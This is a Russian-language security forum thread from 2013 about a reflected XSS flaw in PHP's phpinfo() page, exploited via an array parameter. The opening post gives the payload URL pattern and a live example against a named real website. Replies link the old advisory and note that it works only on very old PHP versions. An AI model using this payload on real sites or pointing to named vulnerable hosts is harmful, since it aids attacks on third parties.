HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Xss в phpinfo().
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.11.2013, 02:59
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
Не нашел про данную уязвимoсть ничего на форуме и поэтому решил запостить.

Формат уязвимой ссылки:

Код:
Code:
httр://site.com/phpinfo.php?a[]=alert('xss')
Пример:

Код:
Code:
http://www.infineform.com/info.php?a[]=alert('xss')
 
Ответить с цитированием

  #2  
Старый 04.11.2013, 11:51
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию
Я на хостинге сайтов находил phpinfo надо проверить на XSS )
 
Ответить с цитированием

  #3  
Старый 04.11.2013, 12:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию
Это старая бага:

http://www.php-security.org/MOPB/MOPB-08-2007.html

http://www.exploit-db.com/exploits/3405/

На том сайте что ты скинул для примера

Код:
Code:
Build Date 	Sep 28 2005 12:31:10
Версия правда 5.0.4, а пишут что только четвёртая ветка уязвима.

Короче будет работать только на очень старых версиях PHP.
 
Ответить с цитированием

  #4  
Старый 04.11.2013, 15:01
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
В четвертых версиях еще запатчили. Странно, почему на 5.0.4 вообще работает. Может не в четвертой, а в ранних версиях пятой.
 
Ответить с цитированием

  #5  
Старый 04.11.2013, 15:11
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479

Репутация: 2
По умолчанию
Мда.Какая глобальная и "новая" уязвимость.
 
Ответить с цитированием

  #6  
Старый 20.11.2013, 17:03
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
Я нигде не писал что уязвимость новая и что я её лично нашёл.

Не все же знали про эту уязвимость и на форуме не было упоминания её.

Кому надо взяли на заметку.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ